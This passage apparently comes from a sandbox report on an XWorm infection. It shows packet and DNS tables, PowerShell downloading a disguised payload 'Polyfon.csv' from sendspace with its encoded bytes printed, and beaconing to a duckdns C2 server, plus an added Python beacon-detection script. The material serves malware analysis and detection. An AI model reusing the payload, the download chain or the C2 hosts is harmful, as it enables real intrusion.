May 23, 2024 21:13:29.218009949 CEST | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
May 23, 2024 21:13:29.365566015 CEST | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
May 23, 2024 21:13:29.385613918 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:13:35.941828012 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:13:35.983464956 CEST | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
May 23, 2024 21:13:40.905682087 CEST | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
May 23, 2024 21:13:41.140084028 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:13:41.315942049 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:13:41.317681074 CEST | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
May 23, 2024 21:13:41.375447035 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:13:52.812100887 CEST | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
May 23, 2024 21:13:52.827723026 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:13:52.997001886 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:13:52.999346018 CEST | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
May 23, 2024 21:13:53.004462004 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:14:04.718307018 CEST | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
May 23, 2024 21:14:04.723925114 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:14:04.897773981 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:14:04.899465084 CEST | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
May 23, 2024 21:14:04.907270908 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:14:05.945641041 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:14:05.999200106 CEST | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
May 23, 2024 21:14:15.390856028 CEST | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
May 23, 2024 21:14:15.396459103 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:14:15.571396112 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
May 23, 2024 21:14:15.572246075 CEST | 49724 | 8896 | 192.168.2.6 | 12.202.180.134
May 23, 2024 21:14:15.585805893 CEST | 8896 | 49724 | 12.202.180.134 | 192.168.2.6
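The rows for 12.202.180.134:8896 above are the XWorm C2 channel, and the sandbox host opens a fresh exchange on it roughly every 12 seconds while the server-initiated packets (21:13:35, 21:14:05) fall between those. The script below, an added example and not part of the Joe Sandbox report, re-keys those rows with explicit column separators (the page lost them on extraction) and measures how regularly the host re-contacts each remote endpoint. The function names, the 2-second quiet gap that splits one exchange from the next, and the jitter and minimum-count thresholds are my own choices, not anything the report defines; the packet times and addresses are the report's.

```python
"""Beacon-period check over the report's TCP packet table (added example, not Joe Sandbox code)."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample: the report's rows for the duckdns C2 (12.202.180.134:8896) plus two
# rows from the sendspace download, with the column separators the page lost put back.
# Columns: time (CEST, date dropped)  src_port  dst_port  src_ip  dst_ip
PACKETS = """\
21:12:56.458343983 49721 443 192.168.2.6 69.31.136.17
21:12:56.458379030 443 49721 69.31.136.17 192.168.2.6
21:13:04.824142933 49724 8896 192.168.2.6 12.202.180.134
21:13:04.840533018 8896 49724 12.202.180.134 192.168.2.6
21:13:04.840625048 49724 8896 192.168.2.6 12.202.180.134
21:13:05.181579113 49724 8896 192.168.2.6 12.202.180.134
21:13:05.186736107 8896 49724 12.202.180.134 192.168.2.6
21:13:05.961226940 8896 49724 12.202.180.134 192.168.2.6
21:13:06.014358044 49724 8896 192.168.2.6 12.202.180.134
21:13:17.087470055 49724 8896 192.168.2.6 12.202.180.134
21:13:17.092504978 8896 49724 12.202.180.134 192.168.2.6
21:13:17.303709030 8896 49724 12.202.180.134 192.168.2.6
21:13:17.306169033 49724 8896 192.168.2.6 12.202.180.134
21:13:17.394809008 8896 49724 12.202.180.134 192.168.2.6
21:13:28.984081984 49724 8896 192.168.2.6 12.202.180.134
21:13:28.994693995 8896 49724 12.202.180.134 192.168.2.6
21:13:29.167359114 8896 49724 12.202.180.134 192.168.2.6
21:13:29.218009949 49724 8896 192.168.2.6 12.202.180.134
21:13:29.365566015 49724 8896 192.168.2.6 12.202.180.134
21:13:29.385613918 8896 49724 12.202.180.134 192.168.2.6
21:13:35.941828012 8896 49724 12.202.180.134 192.168.2.6
21:13:35.983464956 49724 8896 192.168.2.6 12.202.180.134
21:13:40.905682087 49724 8896 192.168.2.6 12.202.180.134
21:13:41.140084028 8896 49724 12.202.180.134 192.168.2.6
21:13:41.315942049 8896 49724 12.202.180.134 192.168.2.6
21:13:41.317681074 49724 8896 192.168.2.6 12.202.180.134
21:13:41.375447035 8896 49724 12.202.180.134 192.168.2.6
21:13:52.812100887 49724 8896 192.168.2.6 12.202.180.134
21:13:52.827723026 8896 49724 12.202.180.134 192.168.2.6
21:13:52.997001886 8896 49724 12.202.180.134 192.168.2.6
21:13:52.999346018 49724 8896 192.168.2.6 12.202.180.134
21:13:53.004462004 8896 49724 12.202.180.134 192.168.2.6
21:14:04.718307018 49724 8896 192.168.2.6 12.202.180.134
21:14:04.723925114 8896 49724 12.202.180.134 192.168.2.6
21:14:04.897773981 8896 49724 12.202.180.134 192.168.2.6
21:14:04.899465084 49724 8896 192.168.2.6 12.202.180.134
21:14:04.907270908 8896 49724 12.202.180.134 192.168.2.6
21:14:05.945641041 8896 49724 12.202.180.134 192.168.2.6
21:14:05.999200106 49724 8896 192.168.2.6 12.202.180.134
21:14:15.390856028 49724 8896 192.168.2.6 12.202.180.134
21:14:15.396459103 8896 49724 12.202.180.134 192.168.2.6
21:14:15.571396112 8896 49724 12.202.180.134 192.168.2.6
21:14:15.572246075 49724 8896 192.168.2.6 12.202.180.134
21:14:15.585805893 8896 49724 12.202.180.134 192.168.2.6
"""

HOST, GAP = "192.168.2.6", 2.0  # sandbox host; seconds of silence that separate two exchanges

def flows(text, host=HOST):
    """Packets grouped by remote (ip, port), as sorted (seconds, outbound) pairs."""
    peers = defaultdict(list)
    for line in text.strip().splitlines():
        t, sport, dport, sip, dip = line.split()
        h, m, s = t.split(":")
        secs = int(h) * 3600 + int(m) * 60 + float(s)
        if sip == host:
            peers[(dip, int(dport))].append((secs, True))
        elif dip == host:
            peers[(sip, int(sport))].append((secs, False))
    return {peer: sorted(pkts) for peer, pkts in peers.items()}

def beacon_stats(pkts, gap=GAP):
    """Count, mean interval and jitter (cv) of exchanges the host opened; None if under 3."""
    starts, prev = [], None
    for secs, outbound in pkts:
        # a packet after a quiet gap opens a new exchange; keep it only if the host sent it
        if (prev is None or secs - prev > gap) and outbound:
            starts.append(secs)
        prev = secs
    if len(starts) < 3:
        return None
    gaps = [b - a for a, b in zip(starts, starts[1:])]
    mu = mean(gaps)
    return {"exchanges": len(starts), "mean_interval": mu, "cv": pstdev(gaps) / mu}

def find_beacons(text, max_cv=0.15, min_exchanges=5):
    """Peers the host re-contacts at a near-constant interval (thresholds are my choice)."""
    hits = {}
    for peer, pkts in flows(text).items():
        stats = beacon_stats(pkts)
        if stats and stats["cv"] <= max_cv and stats["exchanges"] >= min_exchanges:
            hits[peer] = stats
    return hits

if __name__ == "__main__":
    for (ip, port), s in find_beacons(PACKETS).items():
        print(f"{ip}:{port}: {s['exchanges']} exchanges about {s['mean_interval']:.1f}s apart (cv {s['cv']:.3f})")
```

On the report's rows this flags only 12.202.180.134:8896: seven host-initiated exchanges about 11.8 s apart with under 5 % jitter, which is the shape an automated check-in has. The sendspace flow yields a single exchange and is skipped. Counting only host-initiated exchange starts is what keeps the two server-initiated bursts from distorting the interval; dropping that condition would roughly double the measured jitter on this same data.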
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 23, 2024 21:12:13.643240929 CEST | 62659 | 53 | 192.168.2.6 | 1.1.1.1
May 23, 2024 21:12:13.655230045 CEST | 53 | 62659 | 1.1.1.1 | 192.168.2.6
May 23, 2024 21:12:14.555010080 CEST | 52825 | 53 | 192.168.2.6 | 1.1.1.1
May 23, 2024 21:12:14.575926065 CEST | 53 | 52825 | 1.1.1.1 | 192.168.2.6
May 23, 2024 21:12:55.433022976 CEST | 52227 | 53 | 192.168.2.6 | 1.1.1.1
May 23, 2024 21:12:55.478770018 CEST | 53 | 52227 | 1.1.1.1 | 192.168.2.6
May 23, 2024 21:13:04.662554979 CEST | 56078 | 53 | 192.168.2.6 | 1.1.1.1
May 23, 2024 21:13:04.770529985 CEST | 53 | 56078 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 23, 2024 21:12:13.643240929 CEST | 192.168.2.6 | 1.1.1.1 | 0x91c0 | Standard query (0) | www.sendspace.com | A (IP address) | IN (0x0001) | false
May 23, 2024 21:12:14.555010080 CEST | 192.168.2.6 | 1.1.1.1 | 0x561 | Standard query (0) | fs03n4.sendspace.com | A (IP address) | IN (0x0001) | false
May 23, 2024 21:12:55.433022976 CEST | 192.168.2.6 | 1.1.1.1 | 0xfd6a | Standard query (0) | fs03n1.sendspace.com | A (IP address) | IN (0x0001) | false
May 23, 2024 21:13:04.662554979 CEST | 192.168.2.6 | 1.1.1.1 | 0xe6f5 | Standard query (0) | tbsagyw.duckdns.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 23, 2024 21:12:13.655230045 CEST | 1.1.1.1 | 192.168.2.6 | 0x91c0 | No error (0) | www.sendspace.com | | 104.21.28.80 | A (IP address) | IN (0x0001) | false
May 23, 2024 21:12:13.655230045 CEST | 1.1.1.1 | 192.168.2.6 | 0x91c0 | No error (0) | www.sendspace.com | | 172.67.170.105 | A (IP address) | IN (0x0001) | false
May 23, 2024 21:12:14.575926065 CEST | 1.1.1.1 | 192.168.2.6 | 0x561 | No error (0) | fs03n4.sendspace.com | | 69.31.136.17 | A (IP address) | IN (0x0001) | false
May 23, 2024 21:12:55.478770018 CEST | 1.1.1.1 | 192.168.2.6 | 0xfd6a | No error (0) | fs03n1.sendspace.com | | 69.31.136.17 | A (IP address) | IN (0x0001) | false
May 23, 2024 21:13:04.770529985 CEST | 1.1.1.1 | 192.168.2.6 | 0xe6f5 | No error (0) | tbsagyw.duckdns.org | | 12.202.180.134 | A (IP address) | IN (0x0001) | false
• www.sendspace.com
• fs03n4.sendspace.com
• fs03n1.sendspace.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49711 | 104.21.28.80 | 443 | 5092 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-23 19:12:14 UTC | 174 | OUT | GET /pro/dl/jj4uw4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: www.sendspace.com
Connection: Keep-Alive
2024-05-23 19:12:14 UTC | 945 | IN | HTTP/1.1 301 Moved Permanently
Date: Thu, 23 May 2024 19:12:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: SID=4ff7uuntpvdq5u7f4etmg61f61; path=/; domain=.sendspace.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://fs03n4.sendspace.com/dlpro/2322c2dd21531059d1754f0174582ff2/664f950e/jj4uw4/Polyfon.csv
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=viU8mnGWDz2vmdPWCtZ6CbWqTlfZjmOZnxCLqwGFZBMSeDwFpAmwBHpSHjyuwQtmdZ8%2BS0pM%2BRewNRJjLgV1Ke%2FbP5%2BLmzo0yP5AebmUGeyctlStT7tDZl%2FCq%2BFOPZ%2BYOALAjg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 88875b39382917a9-EWR
alt-svc: h3=":443"; ma=86400
2024-05-23 19:12:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49712 | 69.31.136.17 | 443 | 5092 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-23 19:12:15 UTC | 230 | OUT | GET /dlpro/2322c2dd21531059d1754f0174582ff2/664f950e/jj4uw4/Polyfon.csv HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: fs03n4.sendspace.com
Connection: Keep-Alive
2024-05-23 19:12:15 UTC | 496 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 May 2024 19:12:15 GMT
Content-Type: application/octet-stream
Content-Length: 489216
Last-Modified: Fri, 17 May 2024 15:07:43 GMT
Connection: close
Set-Cookie: SID=8mrm2dc8u4e3mbvjaf2nnrj867; path=/; domain=.sendspace.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Disposition: attachment;filename="Polyfon.csv"
ETag: "664772bf-77700"
Accept-Ranges: bytes
2024-05-23 19:12:15 UTC | 15888 | IN | Data Raw: 63 51 47 62 63 51 47 62 75 78 39 43 44 67 44 72 41 6b 4b 48 36 77 49 32 75 41 4e 63 4a 41 52 78 41 5a 76 72 41 74 6b 4b 75 62 62 6a 65 4d 6a 72 41 67 52 45 36 77 4a 58 5a 34 48 70 67 36 41 41 44 75 73 43 4a 54 48 72 41 70 67 4e 67 66 45 7a 51 33 69 36 63 51 47 62 36 77 4a 51 54 65 73 43 77 55 66 72 41 73 55 33 75 6e 48 4d 52 59 37 72 41 6e 6a 6c 36 77 49 36 73 65 73 43 30 6c 42 78 41 5a 73 78 79 75 73 43 64 71 6a 72 41 74 73 6b 69 52 51 4c 36 77 49 39 4c 65 73 43 6e 77 72 52 34 75 73 43 45 38 7a 72 41 73 51 49 67 38 45 45 36 77 4c 6e 6c 33 45 42 6d 34 48 35 6f 58 43 4a 41 33 7a 49 63 51 47 62 63 51 47 62 69 30 51 6b 42 48 45 42 6d 33 45 42 6d 34 6e 44 63 51 47 62 36 77 4c 48 33 34 48 44 75 6e 74 5a 41 65 73 43 4f 53 56 78 41 5a 75 36 42 47 50 6c 44 6e 45
Data Ascii: cQGbcQGbux9CDgDrAkKH6wI2uANcJARxAZvrAtkKubbjeMjrAgRE6wJXZ4Hpg6AADusCJTHrApgNgfEzQ3i6cQGb6wJQTesCwUfrAsU3unHMRY7rAnjl6wI6sesC0lBxAZsxyusCdqjrAtskiRQL6wI9LesCnwrR4usCE8zrAsQIg8EE6wLnl3EBm4H5oXCJA3zIcQGbcQGbi0QkBHEBm3EBm4nDcQGb6wLH34HDuntZAesCOSVxAZu6BGPlDnE
2024-05-23 19:12:15 UTC | 16384 | IN | Data Raw: 53 32 37 36 68 49 78 4c 73 4c 47 44 53 36 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 67 30 75 67 6d 57 42 49 71 6e 4e 70 44 35 59 77 35 46 41 68 31 67 6a 32 32 74 47 44 53 2f 5a 74 62 67 43 62 4a 77 4b 39 70 33 7a 50 32 43 45 56 4d 34 6f 42 46 67 4b 39 49 67 4f 65 47 53 45 6c 76 74 6d 6b 72 41 70 64 41 70 4e 33 33 67 54 58 36 54 31 56 64 4c 50 63 67 61 55 41 79 4f 6f 62 76 59 76 45 4d 78 79 76 44 4e 58 49 74 54 2b 39 4c 67 61 62 6d 50 62 6c 55 6e 38 70 37 4d 48 4a 31 73 47 4e 6c 57 73 56 53 45 46 4e 54 36 44 63 67 6c 77 39 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 2b 34 67 71 70 62 4f 41 74 59 43 38 72 67 73 75 46 44
Data Ascii: S276hIxLsLGDS6DTg0ug04NLoNODS6DTg0ug04NLoNODS6DTg0ugmWBIqnNpD5Yw5FAh1gj22tGDS/ZtbgCbJwK9p3zP2CEVM4oBFgK9IgOeGSElvtmkrApdApN33gTX6T1VdLPcgaUAyOobvYvEMxyvDNXItT+9LgabmPblUn8p7MHJ1sGNlWsVSEFNT6Dcglw904NLoNODS6DTg0ug04NLoNODS6DTg0ug04NLoNODS+4gqpbOAtYC8rgsuFD
2024-05-23 19:12:15 UTC | 16384 | IN | Data Raw: 4a 53 71 6f 36 34 46 62 69 61 78 58 7a 53 45 55 66 45 75 67 30 77 72 2b 39 74 47 44 53 79 6b 74 31 63 41 56 68 59 46 4c 6f 44 74 7a 39 36 54 54 33 55 53 68 49 69 70 4c 6f 4e 4f 44 53 36 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 79 6c 67 69 48 7a 57 2b 4d 6c 66 58 75 4b 62 4f 68 2f 59 73 2f 4c 37 4b 53 74 34 6a 52 43 51 70 51 6b 2b 67 37 6a 2f 59 70 46 61 4d 7a 30 38 53 68 30 75 64 4f 79 35 5a 32 39 77 48 72 32 48 58 67 33 59 4c 49 54 4a 38 72 31 64 61 69 71 54 54 30 66 46 50 42 38 54 41 49 53 47 62 73 31 45 57 41 6f 6c 50 47 46 6a 30 49 53 47 63 49 4e 67 74 41 6f 6c 53 6d 4a 52 45 4b 64 6e 36 5a 58 35 69 4c 37 61 62 4c 44 2f 51 31 45 74 55 47 6e 42 31 61 73 71 38 6e 42 75 76 4a 4e 71 6e 79 49 69
Data Ascii: JSqo64FbiaxXzSEUfEug0wr+9tGDSykt1cAVhYFLoDtz96TT3UShIipLoNODS6DTg0ug04NLoNODS6DTg0ug04NLoNODS6DTylgiHzW+MlfXuKbOh/Ys/L7KSt4jRCQpQk+g7j/YpFaMz08Sh0udOy5Z29wHr2HXg3YLITJ8r1daiqTT0fFPB8TAISGbs1EWAolPGFj0ISGcINgtAolSmJREKdn6ZX5iL7abLD/Q1EtUGnB1asq8nBuvJNqnyIi
2024-05-23 19:12:15 UTC | 16384 | IN | Data Raw: 65 37 72 63 66 49 66 75 2f 6b 7a 6e 45 6d 65 51 69 34 6f 6e 68 62 36 48 6a 65 68 41 4c 55 65 51 66 6c 4a 6e 2b 42 61 4d 44 57 74 70 57 5a 66 41 36 74 76 34 46 77 4d 63 7a 6f 6a 6f 6b 53 47 49 4a 35 4f 43 6d 74 79 6d 38 47 74 41 7a 46 71 6f 74 70 69 37 45 74 64 2b 30 4b 63 4c 47 49 33 6d 45 73 43 57 35 71 36 69 69 4a 55 4b 53 7a 69 66 74 39 73 77 5a 6f 71 6f 32 77 4c 33 64 4e 6e 5a 63 35 6f 4a 51 52 66 73 73 48 43 4f 34 71 45 32 76 69 33 65 65 4d 76 64 64 49 62 59 74 41 43 72 58 7a 46 32 78 53 39 69 2f 49 73 43 4f 4b 67 62 74 33 76 66 55 76 42 44 78 41 49 56 2f 79 47 51 69 39 67 39 33 49 6f 59 47 33 69 2b 5a 34 4a 53 63 4d 4b 54 69 68 54 4b 53 2f 47 4f 50 68 57 46 48 38 4a 47 30 70 33 57 4a 51 58 33 55 53 7a 35 68 4b 58 73 73 4f 54 59 32 47 53 36 68 6f 33
Data Ascii: e7rcfIfu/kznEmeQi4onhb6HjehALUeQflJn+BaMDWtpWZfA6tv4FwMczojokSGIJ5OCmtym8GtAzFqotpi7Etd+0KcLGI3mEsCW5q6iiJUKSzift9swZoqo2wL3dNnZc5oJQRfssHCO4qE2vi3eeMvddIbYtACrXzF2xS9i/IsCOKgbt3vfUvBDxAIV/yGQi9g93IoYG3i+Z4JScMKTihTKS/GOPhWFH8JG0p3WJQX3USz5hKXssOTY2GS6ho3
2024-05-23 19:12:15 UTC | 16384 | IN | Data Raw: 43 71 79 70 31 42 37 4f 56 71 47 51 72 39 6f 4c 6c 68 49 65 41 34 4d 50 78 69 71 2f 44 69 50 68 62 6d 6d 72 44 57 48 52 2f 41 34 35 30 54 49 42 7a 56 72 2f 45 54 6f 67 36 53 2f 38 75 2f 6f 71 52 68 44 59 54 63 6a 48 31 38 47 4d 41 69 55 52 33 4d 35 72 69 33 7a 2b 57 4e 4f 44 53 31 2b 6d 36 36 4f 44 2b 49 64 4c 72 39 4b 51 34 71 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 67 30 75 67 30 34 4d 62 34 50 64 64 5a 30 70 43 66 50 35 59 30 34 4e 4c 53 46 61 74 54 36 42 59 42 72 4f 67 30 34 4e 4b 61 42 57 44 5a 47 7a 4f 43 51 59 47 7a 49 37 45 62 61 4a 51 62 44 69 4f 58 36 6e 46 41 5a 56 74 4f 69 66 6f 31 6b 5a 31 59 53 7a 68 30 4c 32 50 43 2f 61 58 41 45 51 34 79 42 62 75 6e 42 79 45 35 6b 4e 78 6b 6b 78
Data Ascii: Cqyp1B7OVqGQr9oLlhIeA4MPxiq/DiPhbmmrDWHR/A450TIBzVr/ETog6S/8u/oqRhDYTcjH18GMAiUR3M5ri3z+WNODS1+m66OD+IdLr9KQ4qDTg0ug04NLoNODS6DTg0ug04NLoNODS6DTg0ug04Mb4PddZ0pCfP5Y04NLSFatT6BYBrOg04NKaBWDZGzOCQYGzI7EbaJQbDiOX6nFAZVtOifo1kZ1YSzh0L2PC/aXAEQ4yBbunByE5kNxkkx
2024-05-23 19:12:15 UTC | 16384 | IN | Data Raw: 4f 64 55 6b 37 37 6f 74 6d 52 49 43 75 55 36 41 78 69 41 6b 43 67 4b 35 77 38 75 59 66 69 55 4a 41 72 6d 33 48 4f 45 73 6d 41 71 43 6d 69 74 47 49 30 71 67 30 33 57 50 61 68 53 43 74 45 57 6a 48 63 35 7a 55 6f 4a 34 37 2f 44 76 79 6f 6e 71 2b 48 57 48 55 6f 49 37 4d 63 57 57 77 68 30 34 67 6b 75 67 62 43 44 35 51 4c 6b 48 6d 69 45 6b 58 48 2f 46 57 4c 71 44 78 6c 5a 54 79 6c 64 7a 72 4d 77 62 55 6d 79 54 43 64 48 5a 53 6c 6c 59 50 71 43 68 30 34 4f 4d 6f 59 47 72 2b 34 4e 53 71 75 6f 44 6c 48 54 4b 6b 61 6d 62 4a 55 35 58 55 63 71 4a 4b 76 50 52 64 42 51 47 65 61 4c 54 67 37 49 49 76 6a 35 7a 61 75 74 51 79 69 58 68 67 55 75 67 6f 68 77 6d 71 79 56 47 56 69 46 2b 73 55 6d 67 30 79 6b 42 4e 58 51 43 7a 70 4c 52 67 30 76 6a 30 54 6d 56 78 6e 71 4d 6b 4f 45
Data Ascii: OdUk77otmRICuU6AxiAkCgK5w8uYfiUJArm3HOEsmAqCmitGI0qg03WPahSCtEWjHc5zUoJ47/Dvyonq+HWHUoI7McWWwh04gkugbCD5QLkHmiEkXH/FWLqDxlZTyldzrMwbUmyTCdHZSllYPqCh04OMoYGr+4NSquoDlHTKkambJU5XUcqJKvPRdBQGeaLTg7IIvj5zautQyiXhgUugohwmqyVGViF+sUmg0ykBNXQCzpLRg0vj0TmVxnqMkOE
2024-05-23 19:12:15 UTC | 16384 | IN | Data Raw: 75 72 6b 35 4f 62 75 33 47 57 39 4e 48 4d 76 72 5a 73 70 4a 34 62 31 67 70 56 4a 43 67 6c 37 44 65 73 70 52 49 49 70 33 2f 2b 74 41 77 68 32 53 67 55 75 67 57 6b 77 74 49 53 6f 76 43 2f 64 59 50 67 71 69 30 34 50 4f 65 6a 75 5a 53 71 44 54 30 66 45 38 62 51 4a 4c 49 79 6e 48 52 43 54 41 68 30 2b 67 69 64 72 43 4a 58 47 43 53 36 42 72 6b 78 30 34 76 51 65 61 6a 64 65 4d 2f 76 53 31 75 6f 47 6c 39 31 64 48 56 75 61 43 55 46 44 63 75 6f 6b 72 56 69 46 4b 6f 4e 50 38 51 63 62 71 51 73 67 6c 54 34 4e 4c 6f 4e 4b 43 6e 43 51 31 79 73 49 64 5a 6f 4a 4c 6f 46 4a 34 6f 61 62 5a 70 2f 52 37 38 48 48 5a 6d 43 34 43 76 47 76 33 79 2f 51 68 4a 44 44 78 62 4a 30 43 4e 74 43 74 47 55 75 67 33 41 64 58 70 64 65 44 4c 5a 6b 5a 41 6f 7a 39 6b 51 72 58 6d 43 32 36 73 69 74
Data Ascii: urk5Obu3GW9NHMvrZspJ4b1gpVJCgl7DespRIIp3/+tAwh2SgUugWkwtISovC/dYPgqi04POejuZSqDT0fE8bQJLIynHRCTAh0+gidrCJXGCS6Brkx04vQeajdeM/vS1uoGl91dHVuaCUFDcuokrViFKoNP8QcbqQsglT4NLoNKCnCQ1ysIdZoJLoFJ4oabZp/R78HHZmC4CvGv3y/QhJDDxbJ0CNtCtGUug3AdXpdeDLZkZAoz9kQrXmC26sit
2024-05-23 19:12:15 UTC | 16384 | IN | Data Raw: 43 41 75 73 33 49 4a 38 66 74 4f 44 53 36 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 67 30 76 30 30 31 68 5a 70 45 49 43 31 67 6c 4c 6d 63 41 76 32 34 74 4c 6f 46 72 4c 61 32 79 70 38 52 4c 50 75 44 71 79 6f 65 41 4a 65 76 30 36 68 30 57 2b 4c 31 39 6f 62 45 44 36 4b 6b 50 72 47 67 4a 67 77 45 45 44 52 70 6e 46 46 4b 42 59 4e 45 75 6f 30 34 50 43 30 4d 76 52 38 59 4b 64 44 72 77 68 49 61 37 42 75 42 4d 43 75 62 64 4d 62 79 4d 68 49 65 36 61 30 68 51 43 69 63 43 6f 64 79 77 70 79 62 4c 35 4c 62 4d 61 41 47 30 45 73 51 2f 33 38 62 44 49 4f 65 74 36 7a 39 70 4f 73 50 5a 51 30 35 51 72 30 66 59 30 6b 76 6f 75 78 67 51 35 76 63 63 56 33 52 57 51 33 6f 43 59 4f 64 6b 61 2f 36 4a 73 36 6f 6d 41 2f 50 44
Data Ascii: CAus3IJ8ftODS6DTg0ug04NLoNODS6DTg0ug04NLoNODS6DTg0v001hZpEIC1glLmcAv24tLoFrLa2yp8RLPuDqyoeAJev06h0W+L19obED6KkPrGgJgwEEDRpnFFKBYNEuo04PC0MvR8YKdDrwhIa7BuBMCubdMbyMhIe6a0hQCicCodywpybL5LbMaAG0EsQ/38bDIOet6z9pOsPZQ05Qr0fY0kvouxgQ5vccV3RWQ3oCYOdka/6Js6omA/PD
2024-05-23 19:12:15 UTC | 16384 | IN | Data Raw: 4b 55 71 67 30 2f 61 38 34 49 4d 37 39 70 42 7a 6e 48 5a 39 30 34 4e 4c 72 31 66 46 37 36 50 54 32 38 4b 6f 31 74 6d 53 70 39 4b 75 48 58 6e 55 67 69 31 6e 30 33 79 61 4a 42 67 4b 31 68 44 53 67 30 76 47 55 6e 7a 79 38 57 67 77 2b 4b 51 71 41 72 68 71 68 50 33 66 6d 52 45 43 75 47 69 30 6b 43 31 57 45 65 37 4b 59 34 4c 2f 33 56 53 31 42 6f 47 68 43 77 6a 57 45 4e 4b 44 53 79 51 44 52 55 73 77 36 33 66 50 52 68 44 6c 76 47 4c 68 6a 72 63 6b 4e 62 75 6c 38 46 64 2b 7a 32 46 59 7a 32 2b 73 56 6b 44 41 35 50 65 4c 79 74 32 76 56 5a 79 67 30 34 7a 50 5a 75 46 38 74 43 51 52 79 69 32 5a 41 45 56 50 71 46 76 54 38 77 7a 5a 73 42 2b 64 43 6f 4e 4c 6f 4e 77 48 2f 67 50 51 67 78 4d 67 2f 34 73 36 49 53 71 6c 52 6f 61 4f 41 33 2b 6f 75 51 4e 50 71 46 43 37 72 73 5a
Data Ascii: KUqg0/a84IM79pBznHZ904NLr1fF76PT28Ko1tmSp9KuHXnUgi1n03yaJBgK1hDSg0vGUnzy8Wgw+KQqArhqhP3fmRECuGi0kC1WEe7KY4L/3VS1BoGhCwjWENKDSyQDRUsw63fPRhDlvGLhjrckNbul8Fd+z2FYz2+sVkDA5PeLyt2vVZyg04zPZuF8tCQRyi2ZAEVPqFvT8wzZsB+dCoNLoNwH/gPQgxMg/4s6ISqlRoaOA3+ouQNPqFC7rsZ
